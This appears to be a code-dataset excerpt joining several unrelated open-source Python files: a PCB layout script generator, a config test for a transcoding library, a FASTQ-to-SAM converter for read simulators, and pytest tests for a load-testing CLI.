### print "net.route length " + str(len(net.route))
### print "line.points length " + str(len(line.points))
Thickness = line.thickness
Clearance = line.thickness * 2
first = True
prev = Point()
for pt in line.points:
#print "pt " + str(pt)
if first:
first = False
else:
X1 = int(prev._x)
Y1 = int(prev._y)
X2 = int(pt._x)
Y2 = int(pt._y)
ns += 'Line [' + " %d "% X1 + " %d "% Y1 + " %d "% X2 + " %d "% Y2
ns += " %d "% Thickness
ns += " %d "% Clearance
ns += '"auto"'
ns += ']\n'
prev = pt
return ns
def genLayerBlockages(self,layer):
ns = ''
# blockages use absolute coordinates,
for rect in layer.blockages:
# order of processing is important
X1=int(rect.ll._x)
Y1=int(rect.ll._y)
X2=int(rect.ur._x)
Y2=int(rect.ur._y)
ns += ' Polygon("clearpoly")\n'
ns += '(\n'
ns += " [%d "% X1 + " %d ]"% Y1
ns += " [%d "% X1 + " %d ]"% Y2
ns += " [%d "% X2 + " %d ]"% Y2
ns += " [%d "% X2 + " %d ]"% Y1
ns += '\n'
ns += ')\n'
return ns;
# routing
# gen brd layers scr"
def genBrdLayersScr(self):
### print "PCB! gen brd layers scr"
ns = ''
CRLF = "\n"
for l in self.brd.layers:
### print "layer " + l.name
ns += "Layer (" +str(l.num) + " \"" + l.name + "\")" + CRLF
ns += "(" + CRLF
# here go all of the layer elements
for net in self.brd.nets.values():
ns += self.genBrdLayerFromNet(l,net) # Routes
ns += self.generateNetPour(l,net) # Geometry
ns += self.genLayerBlockages(l)
ns += ")" + CRLF
return ns;
def generateRoutes(self):
return self.genBrdLayersScr()
def generateNetPour(self,layer,net):
ns = ''
CRLF = "\n"
### print " layer " + str(layer)
for geom in net.geometry:
### print " found geom in " + net.name + " type " + str(type(geom)) + " layer " + str(geom.layernum) + CRLF
if geom.layernum != layer.num :
continue
# Handle rectangle
#if type(geom) is Rectangle :
if isinstance(geom, Rectangle) :
### print " found Rectangle" + CRLF
rect = Rectangle(geom.ll._x, geom.ll._y, geom.ur._x, geom.ur._y, geom.layernum )
rect.normalize() # normalize just in case
# order of processing is important
X1=int(rect.ll._x)
Y1=int(rect.ll._y)
X2=int(rect.ur._x)
Y2=int(rect.ur._y)
ns += ' Polygon("clearpoly")\n'
ns += '(\n'
ns += " [%d "% X1 + " %d ]"% Y1
ns += " [%d "% X1 + " %d ]"% Y2
ns += " [%d "% X2 + " %d ]"% Y2
ns += " [%d "% X2 + " %d ]"% Y1
ns += '\n'
ns += ')\n'
return ns;
# Geometry on nets, aka pour
def generatePour(self):
ns = ''
CRLF = "\n"
for l in self.brd.layers:
### print "layer " + l.name
ns += "Layer (" +str(l.num) + " \"" + l.name + "\")" + CRLF
ns += "(" + CRLF
# here go through the layers
for net in self.brd.nets.values():
ns += self.generateNetPour(l,net)
ns += ")" + CRLF
return ns;
# Via[]
# Via[17000 182000 31000 3000 34000 2800 "" ""]
# Via [X Y Thickness Clearance Mask Drill "Name" SFlags]
# Via (X Y Thickness Clearance Mask Drill "Name" NFlags)
# Via (X Y Thickness Clearance Drill "Name" NFlags)
# Via (X Y Thickness Drill "Name" NFlags)
# Via (X Y Thickness "Name" NFlags)
# X Y coordinates of center
# Thickness outer diameter of copper annulus
# Clearance add to thickness to get clearance diameter
# Mask diameter of solder mask opening
# Drill diameter of drill
# Name string, name of via (vias have names?)
# SFlags symbolic or numerical flags
# NFlags numerical flags only
def generateVias(self):
ns = ''
CRLF = "\n"
### print " board vias " + str(len(self.brd.vias))
for via in self.brd.vias:
### print "via " + via.name
ns += "Via ["
ns += " %d "% int(via.pos._x) + " %d "% int(via.pos._y)
ns += ' 4000 2000 0 2000 "" "" '
ns += "]" + CRLF
return ns;
#NetList()
#(
# Net("unnamed_net1" "(unknown)")
# (
# Connect("L1-2")
# Connect("L2-1")
# Connect("C2-1")
# Connect("C1-1")
# )
#)
# gen brd net scr"
def genBrdNetlistScr(self):
ns = ''
CRLF = "\n"
ns = 'NetList()' + CRLF
ns += '(' + CRLF
for net in self.sch.nets.values():
name = net.name
ns += "Net(\"" + net.name + "\" \"(unknown)\")" + CRLF
ns += "(" + CRLF
for node in net.nodes:
ns += expandtab("\tConnect(\"") + str(node.dev.refid) + "-" + str(node.pin.num) + "\")" + CRLF
ns += ")" + CRLF
ns += ')' + CRLF
return ns
# pcb footprint file may contain any of the following commands:
# Element [element_flags, description, pcb-name, value, mark_x, mark_y, text_x, text_y, text_direction, text_scale, text_flags]
# Pad [x1 y1 x2 y2 thickness clearance mask name pad_number flags]
# Pin [x y thickness clearance mask drillholedia name number flags]
# ElementArc [x y r1 r2 startangle sweepangle thickness]
# ElementLine [x1 y1 x2 y2 thickness] > thickness != 1000 = 10 mils almost for all footprints
# Comment lines start with the #-sign
#Elements
# Element [element_flags, description, pcb-name, value, mark_x, mark_y, text_x, text_y, text_direction, text_scale, text_flags] item allowed value explanation comment
# element_flags unsigned hex value
# description string text description of footprint written by footprint author
# pcb name string refdes used on this particular pcb xxx
# value string value of component on this particular pcb layout xxx
# mark_x 1/100th mils
# mark_y 1/100th mils
# text_x 1/100th mils
# text_y 1/100th mils
# text direction decimal integer 0=horiz; 1=ccw90; 2=180; 3=cw90
# text_scale decimal integer usu. set 100
# text_flags unsigned hex
# Pads
# Pad[x1 y1 x2 y2 thickness clearance mask name pad_number flags] Item Allowed Value Explanation Comment
# x1 1/100th mils x(1st point)
# y1 1/100th mils y(1st point)
# x2 1/100th mils x(2nd point)
# y2 1/100th mils y(2nd point)
# thickness 1/100 mils width of metal surrounding line segment see Brorson .pdf
# clearance 1/100 mils distance to any other copper on any layer actually 1/2 of this number is used!
# mask 1/100th mils width of mask relief actual width of the mask centered on pad copper
# name string name of pad (arb. string) e.g. pad_1 or positive or any other string
# pad_number string pad # used for nets. it MUST be consistent with the definitions on the netlist.
# flags hex value xxx
# Pin[x y thickness clearance mask drillholedia name number flags] Item Allowed Value Explanation Comment
# x 1/100th mils pin x coord.
# y 1/100th mils pin y coord.
# thickness 1/100th mils copper diameter
# clearance 1/100th mils 2*(cu to cu clearance) if you want a 10 mil clearance, put 2000 (20 mils) here
# mask 1/100th mils diameter of mask aperture actual dia. of hole in mask
# drillholedia 1/100th mils dia. of hole
# name string arb. pin name
# number decimal integer pin number used by nets/rats
# flags hex xxx
# Via[]
# Via[17000 182000 31000 3000 34000 2800 "" ""]
# Via [X Y Thickness Clearance Mask Drill "Name" SFlags]
# Via (X Y Thickness Clearance Mask Drill "Name" NFlags)
# Via (X Y Thickness Clearance Drill "Name" NFlags)
# Via (X Y Thickness Drill "Name" NFlags)
# Via (X Y Thickness "Name" NFlags)
# X Y coordinates of center
# Thickness outer diameter of copper annulus
# Clearance add to thickness to get clearance diameter
# Mask diameter of solder mask opening
# Drill diameter of drill
# Name string, name of via (vias have names?)
# SFlags symbolic or numerical flags
# NFlags numerical flags only
# On the Layer
# Line[]
# Line[137500 107500 132500 102500 4000 3000 "clearline"]
# Text[423000 391500 2 100 "T J PORTER ELECTRONICS" "auto"]
# Polygon("clearpoly")
# (
# [2000 198000] [47000 198000] [47000 187000] [126000 187000] [126000 198000]
# [297000 198000] [297000 1000] [2000 1000]
# )
# Notes:
# Pins - Throughole
# Pads - SMD
# Examples for version 1.99
# TH
# Element["" "Cap" "C17" "" 215500 81500 -9000 -32900 0 150 ""]
# (
# Pin[0 0 8000 3000 11000 3500 "1" "1" ""]
# Pin[0 -20000 8000 3000 11000 3500 "2" "2" ""]
# ElementLine [-5000 5000 5000 5000 1000]
# ElementLine [5000 5000 5000 -25000 1000]
# ElementLine [5000 -25000 -5000 -25000 1000]
# ElementLine [-5000 -25000 -5000 5000 1000]
#
# )
# SMD
# Element["" "SMD 0805" "C13" "" 252500 151000 -3000 4500 0 150 ""]
# (
# Pad[0 0 0 0 6000 3000 9000 "1" "1" "square"]
# Pad[0 -9000 0 -9000 6000 3000 9000 "2" "2" "square"]
# ElementLine [-3500 -12500 -3500 3500 1000]
# ElementLine [3500 -12500 -3500 -12500 1000]
# ElementLine [3500 3500 3500 -12500 1000]
# ElementLine [-3500 3500 3500 3500 1000]
# )
#
# Original
#Element["" "SOT-23 package" "Q7" "" 66666 66666 3200 5900 0 100 ""]
#(
# Pad[0 -300 0 300 3400 3000 4000 "1" "1" "square,edge2"]
# Pad[7800 -300 7800 300 3400 3000 4000 "2" "2" "square,edge2"]
# Pad[3900 -8500 3900 -7900 3400 3000 4000 "3" "3" "square"]
# ElementLine [10300 -11000 -2500 -11000 1000]
# ElementLine [10300 2900 10300 -11000 1000]
# ElementLine [-2500 2900 10300 2900 1000]
# ElementLine [-2500 -11000 -2500 2900 1000]
#)
# Placed on the far side -> layer onsolder?
#Element["selected,onsolder" "SOT-23 package" "Q7" "" 66666 133334 3200 -5900 0 100 "selected,auto"]
#(
# Pad[0 300 0 -300 3400 3000 4000 "1" "1" "selected,onsolder,square"]
# Pad[7800 300 7800 -300 3400 3000 4000 "2" "2" "selected,onsolder,square"]
# Pad[3900 8500 3900 7900 3400 3000 4000 "3" "3" "selected,onsolder,square,edge2"]
# ElementLine [10300 11000 -2500 11000 1000]
# ElementLine [10300 -2900 10300 11000 1000]
# ElementLine [-2500 -2900 10300 -2900 1000]
# ElementLine [-2500 11000 -2500 -2900 1000]
#
# )
# VIAs
# Via[17000 182000 31000 3000 34000 2800 "" ""]
# Via[17000 17000 31000 3000 34000 2800 "" ""]
# Via[282000 17000 31000 3000 34000 2800 "" ""]
# Via[282000 182000 31000 3000 34000 2800 "" ""]
# Via[15500 382500 31000 3000 34000 2800 "" ""]
# Via[15500 217500 31000 3000 34000 2800 "" ""]
# Via[280500 217500 31000 3000 34000 2800 "" ""]
# Tracks are made of Line????
# Layer(1 "solder")
# (
# Line[137500 107500 132500 102500 4000 3000 "clearline"]
# Line[145000 107500 137500 107500 4000 3000 "clearline"]
# Line[85000 112500 85000 107500 4000 3000 "clearline"]
# Line[97500 90000 97500 147500 4000 3000 "clearline"]
#)
# Element [element_flags, description, pcb-name, value, mark_x, mark_y, text_x, text_y, text_direction, text_scale, text_flags]
def gen0805_resitor(self,refid,x,y,v):
CRLF = '\n'
s = 'Element["" "0805 chip resitor" "' + str(refid) + '" "' + str(v) + '" ' +'%i'% x + ' ' + '%i'% y + ' 3200 5900 0 100 ""]' + CRLF
s += '(' + CRLF
s += ' Pad[0 -700 0 700 4500 3000 5100 "1" "1" "square"]' + CRLF
s += ' Pad[8000 -700 8000 700 4500 3000 5100 "2" "2" "square"]' + CRLF
s += ' ElementLine [11700 -4400 -3700 -4400 800]' + CRLF
s += ' ElementLine [11700 4400 11700 -4400 800]' + CRLF
s += ' ElementLine [-3700 4400 11700 4400 800]' + CRLF
s += ' ElementLine [-3700 -4400 -3700 4400 800]' + CRLF
s += ')' + CRLF
return s
def gen0805_capacitor(self,refid,x,y,v):
CRLF = '\n'
s = 'Element["" "0805 chip cap" "' + str(refid) + '" "' + str(v) + '" ' +'%i'% x + ' ' + '%i'% y + ' 3200 5900 0 100 ""]' + CRLF
s += '(' + CRLF
s += ' Pad[0 -700 0 700 4500 3000 5100 "1" "1" "square"]' + CRLF
s += ' Pad[8000 -700 8000 700 4500 3000 5100 "2" "2" "square"]' + CRLF
s += ' ElementLine [11700 -4400 -3700 -4400 800]' + CRLF
s += ' ElementLine [11700 4400 11700 -4400 800]' + CRLF
s += ' ElementLine [-3700 4400 11700 4400 800]' + CRLF
s += ' ElementLine [-3700 -4400 -3700 4400 800]' + CRLF
s += ')' + CRLF
return s
def genSOT23(self, refid, x, y, v):
CRLF = '\n'
s = 'Element["" "SOT-23 package" "' + str(refid) + '" "' + str(v) + '" ' +'%i'% x + ' ' + '%i'% y + ' 3200 5900 0 100 ""]' + CRLF
s += '(' + CRLF
s += ' Pad[0 -300 0 300 3400 3000 4000 "1" "1" "square,edge2"]' + CRLF
s += ' Pad[7800 -300 7800 300 3400 3000 4000 "2" "2" "square,edge2"]' + CRLF
s += ' Pad[3900 -8500 3900 -7900 3400 3000 4000 "3" "3" "square"] ' + CRLF
s += ' ElementLine [10300 -11000 -2500 -11000 1000]' + CRLF
s += ' ElementLine [10300 2900 10300 -11000 1000]' + CRLF
s += ' ElementLine [-2500 2900 10300 2900 1000]' + CRLF
s += ' ElementLine [-2500 -11000 -2500 2900 1000]' + CRLF
s += ')' + CRLF
return s
def rotatePoint(self,pt,x0,y0,angle):
dX = pt._x - x0
dY = pt._y - y0
rX = pt._x
rY = pt._y
if angle == 90:
rX = x0 + dY
rY = y0 - dX
if angle == 180:
rX = x0 - dX
rY = y0 - dY
if angle == 270:
rX = x0 - dY
rY = y0 + dX
return rX,rY
def genElementLine(self,line,dev):
# order of processing is important
X1=int(line.points[0]._x)
Y1=int(line.points[0]._y)
X2=int(line.points[1]._x)
Y2=int(line.points[1]._y)
if dev.bottom:
Y1 = 0 - Y1
Y2 = 0 - Y2
X1,Y1 = self.rotatePoint(Point(X1,Y1),0,0,dev.rotation)
X2,Y2 = self.rotatePoint(Point(X2,Y2),0,0,dev.rotation)
# keep horizontal, vertical Point2 > Point1
if (X1 == X2):
if (Y1 > Y2):
t = Y1
Y1 = Y2
Y2 = t
else:
if (Y1 == Y2):
if (X1 > X2):
t = X1
X1 = X2
X2 = t
ns = 'ElementLine [' + " %d "% X1 + " %d "% Y1 + " %d "% X2 + " %d "% Y2
ns += " %d "% line.thickness
ns += ']\n'
return ns
# rotation is clockwise
def genElementArc(self,arc,dev):
# Thickness, Clearance, Mask, Drill, Name, Number, SFlags
rX = int(arc._x)
rY = int(arc._y)
# rY is
if dev.bottom:
rY = 0 - rY
if dev.rotation == 90:
arc.sangle += 90
if dev.rotation == 180:
arc.sangle += 180
if dev.rotation == 270:
arc.sangle += 270
rX,rY = self.rotatePoint(arc,0,0,dev.rotation)
arc.sangle = arc.sangle % 360
ns = 'ElementArc [' + " %d "% rX + " %d "% rY
ns += " %d "% arc.width
ns += " %d "% arc.height
ns += " %d "% arc.sangle
ns += " %d "% arc.dangle
ns += " %d "% arc.thickness
ns += ']\n'
return ns
def genElementPin(self,pin,dev):
# Thickness, Clearance, Mask, Drill, Name, Number, SFlags
rX=int(pin.pos._x)
rY=int(pin.pos._y)
# Why we do not have to do it for the pins?
# rY is
#if dev.bottom:
# rY = 0 - rY
# Package has not been rotated and must match device pins
rX,rY = self.rotatePoint(Point(rX,rY),0,0,dev.rotation)
ns = 'Pin [' + " %d "% rX + " %d "% rY
ns += " %d "% pin.thickness
ns += " %d "% pin.clearance
ns += " %d "% pin.mask
ns += " %d "% pin.drill
ns += pin.name + ' '
ns += '"' + "%d"% pin.num + '" '
ns += pin.sflags
ns += ']\n'
return ns
def genElementPad(self,pin,dev):
# Thickness, Clearance, Mask, Name, Number, SFlags
# if package was parsed then these are set, if not I need to generate correct ones
rX1=int(pin.rX1)
rY1=int(pin.rY1)
rX2=int(pin.rX2)
rY2=int(pin.rY2)
# Why we do not have to do it for the pads?
#if dev.bottom:
# rY1 = 0 - rY1
# rY2 = 0 - rY2
rX1,rY1 = self.rotatePoint(Point(rX1,rY1),0,0,dev.rotation)
rX2,rY2 = self.rotatePoint(Point(rX2,rY2),0,0,dev.rotation)
try:
sflags = pin.sflags
except:
# no PCB sflags then generate one
# square
# edge2
if pin.pad.type == "S":
sflags ='"square"'
else:
sflags ='""'
ns = 'Pad [' + " %d "% rX1 + " %d "% rY1 + " %d "% rX2 + " %d "% rY2
ns += " %d "% pin.thickness
ns += " %d "% pin.clearance
ns += " %d "% pin.mask
ns += pin.name + ' '
ns += '"' + "%d"% pin.num + '" '
ns += sflags
ns += ']\n'
return ns
def genElementBody(self,dev):
# print'name ' + dev.name
l = len(dev.pins)
# print ' len ' + str(l)
# print 'roation ' + str(dev.rotation)
ns = '(\n'
for num in range(1,l+1):
# print 'pin ' + str(num)
pin = dev.pins[num]
ppin = dev.package.pins[num]
#if dev.package.smt: # event smt packages can have pins aka mounting holes
if ppin.smt:
ns += self.genElementPad(ppin,dev)
else:
ns += self.genElementPin(ppin,dev)
for geo in dev.package.geometry:
if isinstance(geo, Line):
ns += self.genElementLine(geo,dev)
if isinstance(geo, Arc):
ns += self.genElementArc(geo,dev)
if isinstance(geo, Text):
ns += self.genElementText(geo,dev)
ns += ')\n'
return ns
# Device is on the bottom, coordinates of the pad are for the bottom
# Pcb defines package looking from top so mirror it in X back to top
# and add the flags
# For details see the core.py
def genBrdPlaceDevOnSolder(self,dev):
for pad in dev.package.pins.values():
pad.pos._y = 0 - pad.pos._y
try: # quick fix TBI
pad.rY1 = 0 - pad.rY1
except:
pad.rY1 = 0
try: # quick fix TBI
pad.rY2 = 0 - pad.rY2
except:
pad.rY2 = 0
try: # quick fix TBI
newsflags = pad.sflags.strip('"')
except:
newsflags = 'square' # default to square
if newsflags != '':
newsflags = ',' + newsflags
newsflags = '"onsolder' + newsflags + '"'
pad.sflags = newsflags
for pad in dev.package.geometry:
pass
# print pad.sflags
# gen brd place scr"
def genBrdPlaceScr(self):
ns = ''
CRLF = '\n'
devnum = 0
self.brd.outline.calcBBox()
for dev in self.brd.devices.values():
name = str(dev.refid) + CRLF
if dev.bottom:
self.genBrdPlaceDevOnSolder(dev)
x = (int)
#x = (self.brd.outline.bbox.ur._x - dev.position._x) # position is in mils
x = dev.position._x # position is in mils
y = (int)
#y = (self.brd.outline.bbox.ur._y - dev.position._y) # position is in mils
y = dev.position._y # position is in mils
placement = '"onsolder"'
else:
x = (int)
x = dev.position._x # position is in mils
y = (int)
y = dev.position._y # position is in mils
placement = '""'
# place the device
ns += 'Element[' + placement + ' "' + str(dev.package.description) + '" "' + str(dev.refid) + '" "' + str(dev.val) + '" ' +'%i'% x + ' ' + '%i'% y + ' 3200 5900 0 100 ""]' + CRLF
ns += self.genElementBody(dev)
# if name[0:1] == 'R':
# ns += self.gen0805_resitor(dev.refid,x,y,dev.val)
# if name[0:1] == 'C':
# ns += self.gen0805_capacitor(dev.refid,x,y,dev.val)
# if name[0:1] == 'Q':
# ns += self.genSOT23(dev.refid,x,y,dev.val)
# numpins = 0
# for pin in dev.pins:
# numpins += 1
# for k in dev.pins.keys():
# pin = dev.pins[k]
# dev.rotation ?
return ns
def Cmd(self,cmds):
gen = 0
sch = 0
brd = 0
cmd = 0
add = 0
layers = 0
net_connect = 0
netlist = 0
board = 0
place = 0
route = 0
scr = 0
lst = 0
# 0
if cmds[0:1] == ['gen']:
gen = 1
# 1
if cmds[1:2] == ['sch']:
sch = 1
if cmds[1:2] == ['brd']:
brd = 1
# 2
if cmds[2:3] == ['cmd']:
cmd = 1
if cmds[2:3] == ['add']:
add = 1
if cmds[2:3] == ['layers']:
layers = 1
if cmds[2:3] == ['netconnect']:
net_connect = 1
if cmds[2:3] == ['netlist']:
netlist = 1
if cmds[2:3] == ['board']:
board = 1
if cmds[2:3] == ['place']:
place = 1
if cmds[2:3] == ['route']:
route = 1
# 3
if cmds[3:4] == ['scr']:
scr = 1
if cmds[3:4] == ['lst']:
lst = 1
if gen:
if sch:
if add:
if scr:
s = self.genSchAddScr()
return s
if layers:
if scr:
s = self.genSchLayersScr()
return s
if net_connect:
pass
if netlist:
s = self.genSchNetlistLst()
return s
if brd:
if cmd:
if scr:
s = self.genBrdCmdScr() # commands to make the board
return s
if board:
if scr:
s = self.genBrdBoardScr()
return s
if layers:
if scr:
s = self.genBrdLayersScr()
return s
if place:
if scr:
s = self.genBrdPlaceScr()
return s
if netlist:
if scr:
s = self.genBrdNetlistScr()
return s
if route:
pass
return ""
def test(self):
ic1 = CDev("U1","","IC1")
ic1.add( CPin("GND",1) )
ic1.add( CPin("VCC",2) )
self.sch.addDev(ic1)
net1 = CNet("GND")
net1.add(CNode(ic1,"GND"))
self.sch.addNet(net1)
net2 = CNet("VCC")
net2.add(CNode(ic1,"VCC"))
self.sch.addNet(net2)
print "gen sch add scr"
s = self.genSchAddScr()
print s
print "gen sch net-connect scr"
s = self.genSchNetConnectScr()
print s
print "gen sch netlist lst"
s = self.genSchNetlistLst()
print s
print "gen sch netlist scr"
s = self.genSchNetlistScr()
print s
# Some tests
if __name__ == "__main__":
import sys
#import string
import re
schem = CSchematic()
board = CBoard(schem)
board.addFromSchematic()
mucs = CPCB(schem,board)
# open input file
if sys.argv[1:] == ['test']:
mucs.test()
| bsd-3-clause | 2,569,505,188,356,980,700 | 23.228858 | 181 | 0.616108 | false | 2.445766 | false | false | false |
OpenTherapeutics/transcode | tests/test_config.py | 1 | 1153 | import pytest
import transcode.conf
import transcode.render
def my_callback(source, *args, **kws):
pass
CFG_GOOD = {
'TEXT': {'transcoder': my_callback},
}
CFG_BAD = {
'MARK': {'transcoder': 42}
}
class TestConf:
def test_default_config(self):
for fmt, expected in (
(transcode.conf.HTML_FORMAT, transcode.render.render_html),
(transcode.conf.SIMPLE_TEXT_FORMAT, transcode.render.render_simple),
(transcode.conf.MARKDOWN_FORMAT, transcode.render.render_markdown),
(transcode.conf.RST_FORMAT, transcode.render.render_restructuredtext),
):
handler, args, kwargs = transcode.conf.get_transcoder(fmt)
assert handler is expected
def test_config_with_actual_callback(self):
handler, args, kwargs = transcode.conf.get_transcoder('TEXT', CFG_GOOD)
assert handler == my_callback
assert args == ()
assert kwargs == {}
def test_config_with_bad_callback(self):
try:
transcode.conf.load_config(CFG_BAD)
except TypeError:
assert True
else:
assert False
| mit | -1,325,778,167,555,772,200 | 25.813953 | 82 | 0.619254 | false | 3.792763 | false | false | false |
Cibiv/Teaser | tools/fastq2sam.py | 1 | 5577 | #!/usr/bin/env python
"""
Convert FASTQ output of simulators containing simulation information into SAM alignment file
"""
import traceback
import base64
def encode_qname(qname, retain_petag=True):
# return md5.new(str(qname)).hexdigest()
if qname[-2] == "/":
if retain_petag:
return base64.b64encode(qname[0:-2], "-_") + qname[-2:]
else:
return base64.b64encode(qname[0:-2], "-_")
else:
return base64.b64encode(qname, "-_")
class Object:
def __init__(self):
pass
class FASTQ:
def __init__(self, filename, pe):
self.handle = open(filename, "r")
self.out_handle = open("enc_" + filename, "w")
self.lines = iter(self.handle.readlines())
self.is_paired = pe
def readline(self):
return next(self.lines).strip()
def next_read(self):
read = Object()
read.valid = False
try:
read.id = self.readline()
if len(read.id) > 0 and read.id[0] == "@":
read.id = read.id[1:]
else:
raise
read.id_encoded = encode_qname(read.id, self.is_paired)
read.seq = self.readline()
read.desc = self.readline()
read.qual = self.readline()
read.valid = True
self.out_handle.write("@" + read.id_encoded + "\n")
self.out_handle.write("%s\n%s\n%s\n" % (read.seq, read.desc, read.qual))
except Exception as e:
pass
return read
"""
Aligns reads based on their data
"""
class Aligner:
def __init__(self):
pass
def align(read):
pass
class DummyAligner(Aligner):
def align(self, read, paired=False, is_read1=True):
read.chrom = "A"
read.pos = 0
if paired:
read.is_read1 = is_read1
read.is_read2 = not is_read1
else:
read.is_read1 = False
read.is_read2 = False
read.flags = 0
if paired:
read.flags = read.flags | 0x1
if read.is_read1:
read.flags = read.flags | 0x40
if read.is_read2:
read.flags = read.flags | 0x80
def align_pair(self, read1, read2):
self.align(read1, True, True)
self.align(read2, True, False)
class dwgsim(Aligner):
def align(self, read, paired=False, is_read1=True):
# @random_sequence_632951_1_1_0_0_0_2:0:0_0:0:0_0
parts = read.id.split("_")
if is_read1:
read.pos = parts[-9]
else:
read.pos = parts[-8]
if paired:
read.is_read1 = is_read1
read.is_read2 = not is_read1
else:
read.is_read1 = False
read.is_read2 = False
read.chrom = "_".join(parts[0:-9])
# print(read.id,read.chrom,read.pos)
read.flags = 0
reverse = (int(parts[-7]) == 1)
if read.is_read2:
reverse = not reverse
if reverse:
read.flags = read.flags | 0x10
if paired:
read.flags = read.flags | 0x1
if read.is_read1:
read.flags = read.flags | 0x40
if read.is_read2:
read.flags = read.flags | 0x80
def align_pair(self, read1, read2):
self.align(read1, True, True)
self.align(read2, True, False)
class Converter:
def __init__(self, aligner, outfile):
self.aligner = aligner
self.sam = open(outfile, "w")
self.sam_enc = open("enc_" + outfile, "w")
def write(self, what):
self.sam.write(what)
self.sam_enc.write(what)
def write_sam_header(self, reads):
seq = []
for read in reads:
if not read.chrom in seq:
seq.append(read.chrom)
for s in sorted(seq):
self.write("@SQ\tSN:%s\tLN:10000\n" % s)
self.write("@PG\tID:mapper\tPN:mapper\tVN:1.0\n")
def write_single(self, read, to):
read_id = read.id
if read_id[-2] == "/":
read_id = read_id[0:-2]
to.write("%s\t%d\t%s\t%d\t60\t*\t*\t0\t0\t%s\t%s\n" % (
read_id, read.flags, read.chrom, int(read.pos), read.seq, read.qual))
def align_se(self, infile):
fastq = FASTQ(infile, False)
read = fastq.next_read()
# aligned = []
while read.valid:
self.aligner.align(read)
# aligned.append(read)
self.write_single(read, self.sam)
read.id = read.id_encoded
self.write_single(read, self.sam_enc)
del read
read = fastq.next_read()
# self.write_sam_header(aligned)
# for read in aligned:
# self.write_single(read,self.sam)
# read.id = read.id_encoded
# self.write_single(read,self.sam_enc)
self.sam.close()
self.sam_enc.close()
def align_pe(self, infile_1, infile_2):
fq1 = FASTQ(infile_1, True)
fq2 = FASTQ(infile_2, True)
read1 = fq1.next_read()
read2 = fq2.next_read()
aligned1 = []
aligned2 = []
while read1.valid and read2.valid:
self.aligner.align_pair(read1, read2)
aligned1.append(read1)
aligned2.append(read2)
read1 = fq1.next_read()
read2 = fq2.next_read()
self.write_sam_header(aligned1)
for i in range(len(aligned1)):
self.write_single(aligned1[i], self.sam)
self.write_single(aligned2[i], self.sam)
aligned1[i].id = aligned1[i].id_encoded
aligned2[i].id = aligned2[i].id_encoded
self.write_single(aligned1[i], self.sam_enc)
self.write_single(aligned2[i], self.sam_enc)
self.sam.close()
self.sam_enc.close()
if __name__ == "__main__":
import sys
if len(sys.argv) < 3:
print("Usage: fastq2sam.py <simulator> <reads.fastq> [<reads_2.fastq>]")
raise SystemExit
arg_sim = sys.argv[1]
arg_reads1 = sys.argv[2]
if len(sys.argv) > 3:
arg_reads2 = sys.argv[3]
paired = True
else:
paired = False
if arg_sim == "dwgsim":
aligner = dwgsim()
else:
raise "Simulator not supported"
conv = Converter(aligner, arg_reads1 + ".sam")
if not paired:
print(
"Align single-end reads from " + arg_sim + ", input: " + arg_reads1 + ", output " + arg_reads1 + ".sam...")
conv.align_se(arg_reads1)
else:
print(
"Align paired-end reads from " + arg_sim + ", input: " + arg_reads1 + " + " + arg_reads2 + ", output " + arg_reads1 + ".sam...")
conv.align_pe(arg_reads1, arg_reads2)
| mit | -5,396,683,009,936,029,000 | 21.130952 | 131 | 0.636902 | false | 2.524672 | false | false | false |
arielmakestuff/loadlimit | test/unit/cli/test_main.py | 1 | 9995 | # -*- coding: utf-8 -*-
# test/unit/cli/test_main.py
# Copyright (C) 2016 authors and contributors (see AUTHORS file)
#
# This module is released under the MIT License.
"""Test main()"""
# ============================================================================
# Imports
# ============================================================================
# Stdlib imports
import os
from pathlib import Path
import sys
# Third-party imports
from pandas import Timedelta
import pytest
from pytz import timezone
# Local imports
import loadlimit.cli as cli
from loadlimit.cli import main, PROGNAME
from loadlimit.importhook import TaskImporter
from loadlimit.util import LogLevel
# ============================================================================
# Fixtures
# ============================================================================
@pytest.fixture
def empty_argv(monkeypatch):
"""Set sys.argv to an empty list"""
monkeypatch.setattr(sys, 'argv', [])
@pytest.fixture
def norunloop(monkeypatch):
"""Mock runloop() with func that does nothing"""
def fake_runloop(self, config, args, state):
"""fake_runloop"""
cli.process_options(config, args)
monkeypatch.setattr(cli.RunLoop, '__call__', fake_runloop)
pytestmark = pytest.mark.usefixtures('empty_argv', 'norunloop')
# ============================================================================
# Test main
# ============================================================================
def test_main_help(capsys):
"""main"""
with pytest.raises(SystemExit) as err:
main()
assert err.value.args == (0, )
# Check stdout
out, err = capsys.readouterr()
assert out.startswith('usage: {}'.format(PROGNAME))
def test_main_nonempty_sysargv(monkeypatch, capsys):
"""Non-empty sys.argv list"""
monkeypatch.setattr(sys, 'argv', ['loadlimit', '-h'])
with pytest.raises(SystemExit) as err:
main()
assert err.value.args == (0, )
# Check stdout
out, err = capsys.readouterr()
assert out.startswith('usage: {}'.format(PROGNAME))
def test_main_loadlimit_configsection(capsys):
"""loadlimit config section exists in dict passed to main"""
config = dict(loadlimit={})
with pytest.raises(SystemExit) as err:
main(config=config)
assert err.value.args == (0, )
# Check stdout
out, err = capsys.readouterr()
assert out.startswith('usage: {}'.format(PROGNAME))
def test_main_default_args():
"""Config default values"""
config = {}
args = ['-d', '1s', 'what']
with pytest.raises(SystemExit):
main(arglist=args, config=config)
assert config
assert len(config) == 1
assert 'loadlimit' in config
llconfig = config['loadlimit']
names = ['timezone', 'numusers', 'duration', 'importer',
'show-progressbar', 'cache', 'export', 'periods', 'logging',
'qmaxsize', 'flushwait', 'initrate', 'schedsize', 'sched_delay']
assert len(llconfig) == len(names)
for name in names:
assert name in llconfig
assert llconfig['numusers'] == 1
assert llconfig['timezone'] == timezone('UTC')
assert llconfig['duration'] == Timedelta('1s')
assert llconfig['show-progressbar'] is True
assert llconfig['cache']['type'] == 'memory'
assert llconfig['export']['type'] is None
assert 'targetdir' not in llconfig['export']
assert isinstance(llconfig['importer'], TaskImporter)
assert llconfig['periods'] == 8
assert llconfig['logging']['loglevel'] == LogLevel.WARNING
assert llconfig['qmaxsize'] == 1000
assert llconfig['flushwait'] == Timedelta('2s')
assert llconfig['initrate'] == 0
assert llconfig['schedsize'] == 0
assert llconfig['sched_delay'] == Timedelta('0s')
@pytest.mark.parametrize('val', ['fhjdsf', '42z', 'one zots'])
def test_main_bad_duration(val):
"""Invalid value for duration option raises an error"""
config = {}
args = ['-d', val, 'what']
with pytest.raises(ValueError):
main(arglist=args, config=config)
@pytest.mark.parametrize('val', [None, ''])
def test_main_empty_duration(val):
"""Not giving a duration raises an error"""
config = {}
args = ['what']
if val is not None:
args[:0] = ['-d', val]
